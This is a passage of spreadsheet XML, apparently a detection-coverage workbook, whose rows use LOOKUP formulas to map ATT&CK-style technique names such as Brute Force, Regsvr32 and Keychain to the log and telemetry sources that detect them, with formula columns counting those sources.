      </c>
      <c r="B102" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C102" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D102">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H102" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:B)</f>
        <v>Security Support Provider</v>
      </c>
    </row>
    <row r="103" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A103" s="11" t="s">
        <v>162</v>
      </c>
      <c r="B103" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C103" s="8" t="s">
        <v>1159</v>
      </c>
      <c r="D103">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E103">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="H103" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:B)</f>
        <v>Web Service</v>
      </c>
    </row>
    <row r="104" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A104" s="11" t="s">
        <v>163</v>
      </c>
      <c r="B104" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C104" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D104">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E104">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H104" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:B)</f>
        <v>AppInit DLLs</v>
      </c>
    </row>
    <row r="105" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A105" s="11" t="s">
        <v>164</v>
      </c>
      <c r="B105" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C105" s="8" t="s">
        <v>1160</v>
      </c>
      <c r="D105">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E105">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="H105" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:B)</f>
        <v>Multi-Stage Channels</v>
      </c>
    </row>
    <row r="106" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A106" s="11" t="s">
        <v>165</v>
      </c>
      <c r="B106" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C106" s="8" t="s">
        <v>1161</v>
      </c>
      <c r="D106">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E106">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="H106" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:B)</f>
        <v>Remote File Copy</v>
      </c>
    </row>
    <row r="107" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A107" s="11" t="s">
        <v>166</v>
      </c>
      <c r="B107" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C107" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D107">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E107">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H107" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:B)</f>
        <v>Execution through API</v>
      </c>
    </row>
    <row r="108" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A108" s="11" t="s">
        <v>167</v>
      </c>
      <c r="B108" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C108" s="8" t="s">
        <v>1162</v>
      </c>
      <c r="D108">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E108">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H108" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:B)</f>
        <v>File Deletion</v>
      </c>
    </row>
    <row r="109" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A109" s="11" t="s">
        <v>168</v>
      </c>
      <c r="B109" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C109" s="8" t="s">
        <v>1163</v>
      </c>
      <c r="D109">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E109">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="H109" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
    </row>
    <row r="110" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A110" s="11" t="s">
        <v>169</v>
      </c>
      <c r="B110" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Disk forensics,API monitoring,Process monitoring,Component firmware</v>
      </c>
      <c r="C110" s="8" t="s">
        <v>1164</v>
      </c>
      <c r="D110">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E110">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H110" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:B)</f>
        <v>Component Firmware</v>
      </c>
    </row>
    <row r="111" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A111" s="11" t="s">
        <v>170</v>
      </c>
      <c r="B111" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
      <c r="C111" s="8">
        <v>100</v>
      </c>
      <c r="D111">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E111">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H111" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:B)</f>
        <v>Brute Force</v>
      </c>
    </row>
    <row r="112" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A112" s="11" t="s">
        <v>171</v>
      </c>
      <c r="B112" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C112" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D112">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E112">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H112" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:B)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
    </row>
    <row r="113" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A113" s="11" t="s">
        <v>172</v>
      </c>
      <c r="B113" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C113" s="8" t="s">
        <v>1165</v>
      </c>
      <c r="D113">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E113">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="H113" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:B)</f>
        <v>Modify Registry</v>
      </c>
    </row>
    <row r="114" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A114" s="11" t="s">
        <v>173</v>
      </c>
      <c r="B114" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C114" s="8" t="s">
        <v>1166</v>
      </c>
      <c r="D114">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H114" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:B)</f>
        <v>Screen Capture</v>
      </c>
    </row>
    <row r="115" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A115" s="11" t="s">
        <v>174</v>
      </c>
      <c r="B115" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C115" s="8" t="s">
        <v>1167</v>
      </c>
      <c r="D115">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E115">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H115" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:B)</f>
        <v>Email Collection</v>
      </c>
    </row>
    <row r="116" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A116" s="11" t="s">
        <v>175</v>
      </c>
      <c r="B116" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C116" s="8">
        <v>100</v>
      </c>
      <c r="D116">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H116" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
    </row>
    <row r="117" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A117" s="11" t="s">
        <v>176</v>
      </c>
      <c r="B117" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C117" s="8">
        <v>100</v>
      </c>
      <c r="D117">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H117" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:B)</f>
        <v>Code Signing</v>
      </c>
    </row>
    <row r="118" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A118" s="11" t="s">
        <v>177</v>
      </c>
      <c r="B118" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</v>
      </c>
      <c r="C118" s="8" t="s">
        <v>1118</v>
      </c>
      <c r="D118">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E118">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H118" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:B)</f>
        <v>Regsvr32</v>
      </c>
    </row>
    <row r="119" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A119" s="11" t="s">
        <v>178</v>
      </c>
      <c r="B119" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C119" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D119">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E119">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H119" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:B)</f>
        <v>InstallUtil</v>
      </c>
    </row>
    <row r="120" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A120" s="11" t="s">
        <v>179</v>
      </c>
      <c r="B120" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C120" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D120">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H120" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:B)</f>
        <v>Automated Collection</v>
      </c>
    </row>
    <row r="121" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A121" s="11" t="s">
        <v>180</v>
      </c>
      <c r="B121" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C121" s="8">
        <v>0</v>
      </c>
      <c r="D121">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E121">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H121" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
    </row>
    <row r="122" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A122" s="11" t="s">
        <v>181</v>
      </c>
      <c r="B122" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C122" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D122">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E122">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H122" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:B)</f>
        <v>Regsvcs/Regasm</v>
      </c>
    </row>
    <row r="123" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A123" s="11" t="s">
        <v>182</v>
      </c>
      <c r="B123" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,DLL monitoring,Loaded DLLs</v>
      </c>
      <c r="C123" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D123">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E123">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H123" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:B)</f>
        <v>Component Object Model Hijacking</v>
      </c>
    </row>
    <row r="124" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A124" s="11" t="s">
        <v>183</v>
      </c>
      <c r="B124" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C124" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D124">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E124">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H124" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:B)</f>
        <v>Audio Capture</v>
      </c>
    </row>
    <row r="125" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A125" s="11" t="s">
        <v>184</v>
      </c>
      <c r="B125" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C125" s="8" t="s">
        <v>1144</v>
      </c>
      <c r="D125">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E125">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H125" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:B)</f>
        <v>System Time Discovery</v>
      </c>
    </row>
    <row r="126" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A126" s="11" t="s">
        <v>185</v>
      </c>
      <c r="B126" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C126" s="8" t="s">
        <v>1138</v>
      </c>
      <c r="D126">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E126">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H126" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
    </row>
    <row r="127" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A127" s="11" t="s">
        <v>186</v>
      </c>
      <c r="B127" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</v>
      </c>
      <c r="C127" s="8" t="s">
        <v>1169</v>
      </c>
      <c r="D127">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E127">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H127" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:B)</f>
        <v>Network Share Connection Removal</v>
      </c>
    </row>
    <row r="128" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A128" s="11" t="s">
        <v>187</v>
      </c>
      <c r="B128" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C128" s="8">
        <v>100</v>
      </c>
      <c r="D128">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E128">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H128" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:B)</f>
        <v>Trusted Developer Utilities</v>
      </c>
    </row>
    <row r="129" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A129" s="11" t="s">
        <v>188</v>
      </c>
      <c r="B129" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C129" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D129">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E129">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H129" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:B)</f>
        <v>Netsh Helper DLL</v>
      </c>
    </row>
    <row r="130" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A130" s="11" t="s">
        <v>189</v>
      </c>
      <c r="B130" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C130" s="8" t="s">
        <v>1170</v>
      </c>
      <c r="D130">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E130">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H130" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:B)</f>
        <v>Execution through Module Load</v>
      </c>
    </row>
    <row r="131" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A131" s="11" t="s">
        <v>190</v>
      </c>
      <c r="B131" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Digital certificate logs</v>
      </c>
      <c r="C131" s="8" t="s">
        <v>1129</v>
      </c>
      <c r="D131">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>2</v>
      </c>
      <c r="E131">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="H131" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:B)</f>
        <v>Install Root Certificate</v>
      </c>
    </row>
    <row r="132" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A132" s="11" t="s">
        <v>191</v>
      </c>
      <c r="B132" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C132" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D132">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E132">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H132" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:B)</f>
        <v>Authentication Package</v>
      </c>
    </row>
    <row r="133" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A133" s="11" t="s">
        <v>192</v>
      </c>
      <c r="B133" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C133" s="8" t="s">
        <v>1106</v>
      </c>
      <c r="D133">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H133" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:B)</f>
        <v>Data Encoding</v>
      </c>
    </row>
    <row r="134" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A134" s="11" t="s">
        <v>193</v>
      </c>
      <c r="B134" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C134" s="8">
        <v>100</v>
      </c>
      <c r="D134">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="H134" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:B)</f>
        <v>External Remote Services</v>
      </c>
    </row>
    <row r="135" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A135" s="11" t="s">
        <v>194</v>
      </c>
      <c r="B135" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C135" s="8" t="s">
        <v>1128</v>
      </c>
      <c r="D135">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E135">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H135" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:B)</f>
        <v>Access Token Manipulation</v>
      </c>
    </row>
    <row r="136" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A136" s="11" t="s">
        <v>195</v>
      </c>
      <c r="B136" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C136" s="8" t="s">
        <v>1164</v>
      </c>
      <c r="D136">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H136" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:B)</f>
        <v>Network Share Discovery</v>
      </c>
    </row>
    <row r="137" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A137" s="11" t="s">
        <v>196</v>
      </c>
      <c r="B137" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C137" s="8" t="s">
        <v>1171</v>
      </c>
      <c r="D137">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E137">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H137" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:B)</f>
        <v>Create Account</v>
      </c>
    </row>
    <row r="138" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A138" s="11" t="s">
        <v>197</v>
      </c>
      <c r="B138" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C138" s="8" t="s">
        <v>1130</v>
      </c>
      <c r="D138">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E138">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="H138" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:B)</f>
        <v>Office Application Startup</v>
      </c>
    </row>
    <row r="139" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A139" s="11" t="s">
        <v>198</v>
      </c>
      <c r="B139" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C139" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D139">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E139">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="H139" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:B)</f>
        <v>Application Shimming</v>
      </c>
    </row>
    <row r="140" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A140" s="11" t="s">
        <v>199</v>
      </c>
      <c r="B140" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C140" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D140">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E140">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H140" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:B)</f>
        <v>Bash History</v>
      </c>
    </row>
    <row r="141" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A141" s="11" t="s">
        <v>200</v>
      </c>
      <c r="B141" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="8" t="s">
        <v>1172</v>
      </c>
      <c r="D141">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H141" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
    </row>
    <row r="142" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A142" s="11" t="s">
        <v>201</v>
      </c>
      <c r="B142" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,User interface,PowerShell logs</v>
      </c>
      <c r="C142" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D142">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E142">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H142" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:B)</f>
        <v>Input Prompt</v>
      </c>
    </row>
    <row r="143" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A143" s="11" t="s">
        <v>202</v>
      </c>
      <c r="B143" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C143" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D143">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E143">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H143" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:B)</f>
        <v>Keychain</v>
      </c>
    </row>
    <row r="144" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A144" s="11" t="s">
        <v>203</v>
      </c>
      <c r="B144" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C144" s="8">
        <v>100</v>
      </c>
      <c r="D144">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E144">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H144" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:B)</f>
        <v>Hidden Window</v>
      </c>
    </row>
    <row r="145" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A145" s="11" t="s">
        <v>204</v>
      </c>
      <c r="B145" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C145" s="8">
        <v>0</v>
      </c>
      <c r="D145">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E145">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H145" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:B)</f>
        <v>Gatekeeper Bypass</v>
      </c>
    </row>
    <row r="146" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A146" s="11" t="s">
        <v>205</v>
      </c>
      <c r="B146" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C146" s="8">
        <v>100</v>
      </c>
      <c r="D146">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E146">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H146" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:B)</f>
        <v>Private Keys</v>
      </c>
    </row>
    <row r="147" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A147" s="11" t="s">
        <v>206</v>
      </c>
      <c r="B147" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C147" s="8" t="s">
        <v>1173</v>
      </c>
      <c r="D147">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E147">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H147" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:B)</f>
        <v>Clear Command History</v>
      </c>
    </row>
    <row r="148" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A148" s="11" t="s">
        <v>207</v>
      </c>
      <c r="B148" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C148" s="8" t="s">
        <v>1173</v>
      </c>
      <c r="D148">
        <f t="shared" si="5"/>
